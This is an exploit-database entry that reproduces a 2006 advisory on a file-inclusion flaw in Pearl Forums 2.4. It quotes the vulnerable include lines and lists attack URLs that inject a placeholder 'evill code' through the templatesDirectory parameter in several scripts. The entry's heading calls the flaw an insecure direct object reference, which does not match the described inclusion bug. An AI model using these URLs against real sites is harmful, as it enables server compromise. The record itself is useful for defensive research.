header-logo
Suggest Exploit
vendor:
Pearl Forums
by:
Dr Max Virus
7,5
CVSS
HIGH
Insecure Direct Object Reference
639
CWE
Product Name: Pearl Forums
Affected Version From: 2.4
Affected Version To: 2.4
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Unknown

Pearl Forums

The Pearl Forums application is vulnerable to Insecure Direct Object Reference due to the lack of proper input validation. This allows an attacker to inject malicious code into the application by manipulating the 'templatesDirectory' parameter in the vulnerable scripts such as admin.php, password.php, profile.php, merge.php, and adminPolls.php.

Mitigation:

Input validation should be implemented to prevent malicious code injection.
Source

Exploit-DB raw data:

_____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/


/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//Script:Pearl Forums
//Author: Dr Max Virus
//Location:Egypt :)
//Description:The main  Script Of Pearl Products
//Affected Version:2.4
//D
script:http://sourceforge.net/project/downloading.php?group_id=102974&use_mirror=switch&filename=pearlforums2.4.zip&351611
/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//----------------------------------------------------------------------------------

 Bug in
  adressbook.php & admin.php & merge.php &
more than
 u expected files r vulnerable just try to check all files
 Like the Vulnerable Scripts Of Pearl

--------------------------------------------------------------------------------\\

-------------------------------------------------------------------------------
 Vul Codes:
 include_once("$GlobalSettings[templatesDirectory]/addressbook.php");
 include_once("$templatesDirectory/admin.php");

-----------------------------------------------------------------------------------
 Exploits:
 ~~~~~~~~~
 Note that more variables are not sanitized so Exploits can work
Successfuly when
 register_globals=on



code
http://[target]/[path]/includes/admin.php?templatesDirectory-evill code
http://[target]/[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill
code

    And Many Bug u can discovered just download the script

-----------------------------------------------------------------------------------
    Thx To:str0ke & www.milw0rm.com & www.zone-h.com & All My Friends
    Special Gr33Ts:ASIANEAGLE & Kacper & The Master

////////////////////////////////////////////////////////////////////////////////////

# milw0rm.com [2006-11-21]

Navigation

Suggest Exploit

Services By CQR